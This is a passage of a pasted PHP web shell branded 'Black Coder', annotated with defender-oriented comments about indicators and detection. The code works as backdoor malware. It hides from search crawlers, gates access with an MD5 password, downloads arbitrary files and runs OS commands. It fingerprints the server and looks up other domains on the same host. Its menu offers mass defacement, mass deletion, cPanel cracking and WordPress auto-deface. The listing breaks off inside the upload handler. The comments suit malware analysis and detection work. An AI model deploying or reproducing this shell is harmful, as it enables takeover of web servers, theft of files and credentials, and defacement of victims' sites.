
Untitled

a guest Jun 18th, 2019 96 Never
  1. <?php
  2. session_start();
  3. error_reporting(0); // This call and the ini_set() calls below turn off error display and error logging, so PHP errors raised by this script are neither shown nor logged; the web server's access log is the more useful evidence source.
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0); // This function was removed in PHP 7.0, which dates the code to PHP 5.x-era hosts.
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "908261938eee51d82f324e3a33ebd622"; // default: aungkyawzaw -- 32-hex-character value that the login check further down compares with md5($_POST['pass']) using ==, i.e. an unsalted MD5 of the operator password. The literal is a stable string to search for when sweeping web roots.
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan'; // NOTE(review): this setting and its neighbours ($color, $default_use_ajax, $default_charset) are not referenced in the visible part of the listing; the names look inherited from the widely circulated WSO shell preamble -- confirm against known samples.
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) { // Crawler cloaking: the User-Agent header is matched case-insensitively against the names below.
  19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21.         header('HTTP/1.0 404 Not Found'); // A match gets a bare 404 and the script stops, so search engines and clients using these agent strings never see the page. A 404 for a bot User-Agent but a 200 for a browser on the same path is a useful triage signal.
  22.         exit;
  23.     }
  24. }
  25.  
  26. function login_shell() { // Prints the password prompt below and ends the request. Takes no arguments and never returns to the caller. The form has no action attribute, so the single field `pass` is POSTed back to the script's own URL.
  27. ?>
  28. <html>
  29. <head>
  30. <title>blackcoder</title>
  31. <style type="text/css">
  32. html {
  33.     margin: 20px auto;
  34.     background: #000000;
  35.     color: green;
  36.     text-align: center;
  37. }
  38. header {
  39.     color: green;
  40.     margin: 10px auto;
  41. }
  42. input[type=password] {
  43.     width: 250px;
  44.     height: 25px;
  45.     color: blue;
  46.     background: #000000;
  47.     border: 1px dotted green;
  48.     padding: 5px;
  49.     margin-left: 20px;
  50.     text-align: center;
  51. }
  52. h1{
  53.     color:blue;
  54.     }
  55. </style>
  56. </head>
  57. <center>
  58. <header>
  59. <img src="https://i.ibb.co/4SZ4Hst/Edited.png"><br>
  60. <h1>B!4CK_C0D3R</h1>
  61. </header>
  62. <form method="post">
  63. <input type="password" name="pass">
  64. </form></center>
  65. <?php
  66. exit; // Stops here, so none of the code after the login gate runs for a visitor who has not passed it. The page title, the banner text and the externally hosted image URL above are content and network indicators for this sample.
  67. }
  68. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) // Login gate: the session flag is stored under the MD5 of the request's Host header.
  69.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) // An empty $auth_pass admits every visitor; otherwise the posted `pass` is MD5-hashed and compared with the loose == operator.
  70.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  71.     else
  72.         login_shell(); // Shows the prompt and exits, so everything below is reached only with the session flag set.
  73. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) { // File download: streams the path given in the `file` query parameter when act=download. No directory restriction is applied, so this covers any file the PHP process can read. Requests carrying both `file=` and `act=download` are worth hunting for in access logs.
  74.     @ob_clean();
  75.     $file = $_GET['file'];
  76.     header('Content-Description: File Transfer');
  77.     header('Content-Type: application/octet-stream');
  78.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  79.     header('Expires: 0');
  80.     header('Cache-Control: must-revalidate');
  81.     header('Pragma: public');
  82.     header('Content-Length: ' . filesize($file));
  83.     readfile($file);
  84.     exit;
  85. }
  86. ?>
  87. <html>
  88. <head>
  89. <title>Black Coder</title>
  90. <meta name='author' content='black coder'>
  91. <meta charset="UTF-8">
  92. <style type='text/css'>
  93. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  94. html {
  95.    background:#000000;
  96.     color: #ffffff;
  97.     font-family: 'Ubuntu';
  98.     font-size: 13px;
  99.     width: 100%;
  100. }
  101. li {
  102.     display: inline;
  103.     margin: 5px;
  104.     padding: 5px;
  105. }
  106. table, th, td {
  107.     border-collapse:collapse;
  108.     font-family: Tahoma, Geneva, sans-serif;
  109.     background: transparent;
  110.     font-family: 'Ubuntu';
  111.     font-size: 13px;
  112. }
  113. .table_home, .th_home, .td_home {
  114.     border: 1px solid #ffffff;
  115. }
  116. th {
  117.     padding: 10px;
  118. }
  119. a {
  120.     color: #ffffff;
  121.     text-decoration: none;
  122. }
  123. a:hover {
  124.     color: gold;
  125.     text-decoration: underline;
  126. }
  127. b {
  128.     color: gold;
  129. }
  130. input[type=text], input[type=password],input[type=submit] {
  131.     background: transparent;
  132.     color: #ffffff;
  133.     border: 1px solid #ffffff;
  134.     margin: 5px auto;
  135.     padding-left: 5px;
  136.     font-family: 'Ubuntu';
  137.     font-size: 13px;
  138. }
  139. textarea {
  140.     border: 1px solid #ffffff;
  141.     width: 100%;
  142.     height: 400px;
  143.     padding-left: 5px;
  144.     margin: 10px auto;
  145.     resize: none;
  146.     background: transparent;
  147.     color: #ffffff;
  148.     font-family: 'Ubuntu';
  149.     font-size: 13px;
  150. }
  151. select {
  152.     width: 152px;
  153.     background: #000000;
  154.     color: lime;
  155.     border: 1px solid #ffffff;
  156.     margin: 5px auto;
  157.     padding-left: 5px;
  158.     font-family: 'Ubuntu';
  159.     font-size: 13px;
  160. }
  161. option:hover {
  162.     background: lime;
  163.     color: #000000;
  164. }
  165. </style>
  166. </head>
  167. <?php
  168.  
  169. function w($dir,$perm) { // Returns $perm wrapped in a <font> tag: red when $dir is not writable by the PHP process, lime when it is. $perm is inserted into the markup unescaped.
  170.     if(!is_writable($dir)) {
  171.         return "<font color=red>".$perm."</font>";
  172.     } else {
  173.         return "<font color=lime>".$perm."</font>";
  174.     }
  175. }
  176. function r($dir,$perm) { // Same as w() but keyed on readability: red when $dir is not readable by the PHP process, lime when it is. $perm is inserted into the markup unescaped.
  177.     if(!is_readable($dir)) {
  178.         return "<font color=red>".$perm."</font>";
  179.     } else {
  180.         return "<font color=lime>".$perm."</font>";
  181.     }
  182. }
  183. function exe($cmd) { // OS command wrapper: passes $cmd to the first of system, exec, passthru, shell_exec for which function_exists() is true and returns the captured output as a string. Falls off the end (returns null) when none of the four exists. Hardening note: listing these functions in php.ini disable_functions is the usual way to close this path, and child processes spawned by the web-server account are the matching detection point.
  184.     if(function_exists('system')) {        
  185.         @ob_start();       
  186.         @system($cmd);     
  187.         $buff = @ob_get_contents();        
  188.         @ob_end_clean();       
  189.         return $buff;  
  190.     } elseif(function_exists('exec')) {        
  191.         @exec($cmd,$results);      
  192.         $buff = "";        
  193.         foreach($results as $result) {         
  194.             $buff .= $result;       // Output lines are concatenated with no separator in this branch.
  195.         } return $buff;    
  196.     } elseif(function_exists('passthru')) {        
  197.         @ob_start();       
  198.         @passthru($cmd);       
  199.         $buff = @ob_get_contents();        
  200.         @ob_end_clean();       
  201.         return $buff;  
  202.     } elseif(function_exists('shell_exec')) {      
  203.         $buff = @shell_exec($cmd);     
  204.         return $buff;  
  205.     }
  206. }
  207. function perms($file){ // Formats the mode returned by fileperms($file) as a 10-character string in the style of `ls -l`: one file-type character followed by the owner, group and world rwx triplets. The fileperms() result is used without checking for failure.
  208.     $perms = fileperms($file);
  209.     if (($perms & 0xC000) == 0xC000) {
  210.     // Socket
  211.     $info = 's';
  212.     } elseif (($perms & 0xA000) == 0xA000) {
  213.     // Symbolic Link
  214.     $info = 'l';
  215.     } elseif (($perms & 0x8000) == 0x8000) {
  216.     // Regular
  217.     $info = '-';
  218.     } elseif (($perms & 0x6000) == 0x6000) {
  219.     // Block special
  220.     $info = 'b';
  221.     } elseif (($perms & 0x4000) == 0x4000) {
  222.     // Directory
  223.     $info = 'd';
  224.     } elseif (($perms & 0x2000) == 0x2000) {
  225.     // Character special
  226.     $info = 'c';
  227.     } elseif (($perms & 0x1000) == 0x1000) {
  228.     // FIFO pipe
  229.     $info = 'p';
  230.     } else {
  231.     // Unknown
  232.     $info = 'u';
  233.     }
  234.         // Owner
  235.     $info .= (($perms & 0x0100) ? 'r' : '-');
  236.     $info .= (($perms & 0x0080) ? 'w' : '-');
  237.     $info .= (($perms & 0x0040) ? // Execute bit combined with 0x0800 (setuid): 's' when both are set, 'S' when only setuid is set.
  238.     (($perms & 0x0800) ? 's' : 'x' ) :
  239.     (($perms & 0x0800) ? 'S' : '-'));
  240.     // Group
  241.     $info .= (($perms & 0x0020) ? 'r' : '-');
  242.     $info .= (($perms & 0x0010) ? 'w' : '-');
  243.     $info .= (($perms & 0x0008) ? // Execute bit combined with 0x0400 (setgid).
  244.     (($perms & 0x0400) ? 's' : 'x' ) :
  245.     (($perms & 0x0400) ? 'S' : '-'));
  246.     // World
  247.     $info .= (($perms & 0x0004) ? 'r' : '-');
  248.     $info .= (($perms & 0x0002) ? 'w' : '-');
  249.     $info .= (($perms & 0x0001) ? // Execute bit combined with 0x0200 (sticky): 't' or 'T'.
  250.     (($perms & 0x0200) ? 't' : 'x' ) :
  251.     (($perms & 0x0200) ? 'T' : '-'));
  252.     return $info;
  253. }
  254. function hdd($s) { // Formats a byte count $s as a string with two decimals and a GB, MB or KB suffix (1024-based thresholds); values below 1024 are returned as "<n> B" without formatting.
  255.     if($s >= 1073741824)
  256.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  257.     elseif($s >= 1048576)
  258.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  259.     elseif($s >= 1024)
  260.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  261.     else
  262.     return $s .' B';
  263. }
  264. function ambilKata($param, $kata1, $kata2){ // Returns the part of $param that lies between the first occurrence of $kata1 and the next occurrence of $kata2 after it. Returns FALSE when either marker is absent from $param.
  265.     if(strpos($param, $kata1) === FALSE) return FALSE;
  266.     if(strpos($param, $kata2) === FALSE) return FALSE;
  267.     $start = strpos($param, $kata1) + strlen($kata1); // Offset just past the opening marker.
  268.     $end = strpos($param, $kata2, $start); // Closing marker is searched only from $start onward.
  269.     $return = substr($param, $start, $end - $start);
  270.     return $return;
  271. }
  272. function getsource($url) { // Fetches $url with cURL and returns the curl_exec() result (the response body, or false on failure). Redirects are followed and $url is used as given, with no validation.
  273.     $curl = curl_init($url);
  274.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  275.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  276.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // TLS certificate verification is switched off here ...
  277.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); // ... and so is host-name verification, so HTTPS responses are accepted from any endpoint.
  278.     $content = curl_exec($curl);
  279.             curl_close($curl);
  280.     return $content;
  281. }
  282. function bing($dork) { // Pages through Bing search results for the query $dork via getsource(), collects the host part of each result link and echoes the unique hosts one per line. Returns nothing. Defender view: repeated outbound requests from the web server to www.bing.com/search with a stepping `first=` parameter are a network indicator of this routine.
  283.     $npage = 1;
  284.     $npages = 30000;
  285.     $allLinks = array();
  286.     $lll = array(); // Never read in this function.
  287.     while($npage <= $npages) {
  288.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); // $dork is concatenated into the URL without encoding.
  289.         if($x) {
  290.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  291.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  292.             $npage = $npage + 10;
  293.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break; // Stops when the fetched page holds no link to the next offset.
  294.         } else break;
  295.     }
  296.     $URLs = array();
  297.     foreach($allLinks as $url){
  298.         $exp = explode("/", $url);
  299.         $URLs[] = $exp[2]; // Third "/"-separated piece, i.e. the host for a scheme://host/... link.
  300.     }
  301.     $array = array_filter($URLs);
  302.     $array = array_unique($array);
  303.     $sss = count(array_unique($array)); // Computed but not used afterwards.
  304.     foreach($array as $domain) {
  305.         echo $domain."\n";
  306.     }
  307. }
  308. function reverse($url) { // POSTs $url as `remoteAddress` to the third-party lookup endpoint below, strips the punctuation from the response text and echoes each resulting entry prefixed with "http://", flushing after every line. Returns nothing. Defender view: outbound POSTs from a web server to this host are a network indicator of this routine.
  309.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  310.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  311.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket="); // $url is interpolated into the POST body without encoding.
  312.           curl_setopt($ch, CURLOPT_HEADER, 0);
  313.           curl_setopt($ch, CURLOPT_POST, 1);
  314.     $resp = curl_exec($ch);
  315.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  316.     $array = explode(",,", $resp); // The response is taken apart by string replacement and splitting rather than by a JSON decoder.
  317.     unset($array[0]);
  318.     foreach($array as $lnk) {
  319.         $lnk = "http://$lnk";
  320.         $lnk = str_replace(",", "", $lnk);
  321.         echo $lnk."\n";
  322.         ob_flush();
  323.         flush();
  324.     }
  325.         curl_close($ch);
  326. }
  327. if(get_magic_quotes_gpc()) { // When magic quotes are on, the added backslashes are stripped again from $_POST and $_COOKIE. get_magic_quotes_gpc() was removed in PHP 8.0, another sign that the code targets older PHP versions.
  328.     function idx_ss($array) { // Recursively applies stripslashes() to a value or to every element of a nested array.
  329.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  330.     }
  331.     $_POST = idx_ss($_POST);
  332.     $_COOKIE = idx_ss($_COOKIE);
  333. }
  334.  
  335. if(isset($_GET['dir'])) { // Working directory: `dir` is taken straight from the query string and handed to chdir() with no validation.
  336.     $dir = $_GET['dir'];
  337.     chdir($dir);
  338. } else {
  339.     $dir = getcwd();
  340. }
  341. $kernel = php_uname(); // From here to the end of this run the script fingerprints the host: OS string, IP, disk space, PHP restrictions, available tooling and the account PHP runs as.
  342. $ip = gethostbyname($_SERVER['HTTP_HOST']); // Resolves the client-supplied Host header.
  343. $dir = str_replace("\\","/",$dir);
  344. $scdir = explode("/", $dir);
  345. $freespace = hdd(disk_free_space("/"));
  346. $total = hdd(disk_total_space("/"));
  347. $used = $total - $freespace;
  348. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  349. $ds = @ini_get("disable_functions"); // Reads the list of functions the administrator has disabled; it is displayed on the page further down.
  350. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  351. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  352. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; // This and the next two lines run `wget --help`, `perl --help` and `python --help` through exe() on every page load. A PHP worker spawning these three commands is a high-signal pattern for process-creation monitoring.
  353. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  354. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  355. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  356. if(!function_exists('posix_getegid')) { // Without the POSIX extension, fall back to the script owner's name/uid/gid; the group name is shown as "?".
  357.     $user = @get_current_user();
  358.     $uid = @getmyuid();
  359.     $gid = @getmygid();
  360.     $group = "?";
  361. } else {
  362.     $uid = @posix_getpwuid(posix_geteuid()); // Effective user and group of the running PHP process.
  363.     $gid = @posix_getgrgid(posix_getegid());
  364.     $user = $uid['name'];
  365.     $uid = $uid['uid'];
  366.     $group = $gid['name'];
  367.     $gid = $gid['gid'];
  368. }
  369. echo "System: <font color=lime>".$kernel."</font><br>"; // Status banner: prints the values gathered above. All of them, including the request-derived $dir, are written into the HTML without escaping.
  370. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  371. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  372. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  373. echo "Safe Mode: $sm<br>";
  374. echo "Disable Functions: $show_ds<br>";
  375. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  376. echo "Current DIR: ";
  377. foreach($scdir as $c_dir => $cdir) {    // Breadcrumb: one link per path component, each pointing at ?dir=<path up to and including that component>.
  378.     echo "<a href='?dir=";
  379.     for($i = 0; $i <= $c_dir; $i++) {
  380.         echo $scdir[$i];
  381.         if($i != $c_dir) {
  382.         echo "/";
  383.         }
  384.     }
  385.     echo "'>$cdir</a>/";
  386. }
  387. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]"; // Permission string of the current directory, coloured by whether the PHP process can write to it.
  388. echo "<hr>";
  389. echo "<center>"; // Action menu: every entry below is a link that only sets the `dir` and `do` query parameters; the code that acts on `do` is in the if/elseif chain that follows this run. The `do=` values listed here are convenient literal strings for access-log hunting and request-filter rules.
  390. echo "<ul>";
  391. echo "<li>[ <a href='?'>Home</a> ]</li>";
  392. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  393. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  394. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  395. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  396. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  397. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  398. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  399. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  400. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  401. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  402. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
  403. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  404. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  406. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  409. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  411. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>"; // Handled by the first branch of the chain below, which removes the session flag set at login.
  412. echo "</ul>";
  413. echo "</center>";
  414. echo "<hr>";
  415. if($_GET['logout'] == true) {
  416.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  417.     echo "<script>window.location='?';</script>";
  418. } elseif($_GET['do'] == 'upload') {
  419.     echo "<center>";
  420.     if($_POST['upload']) {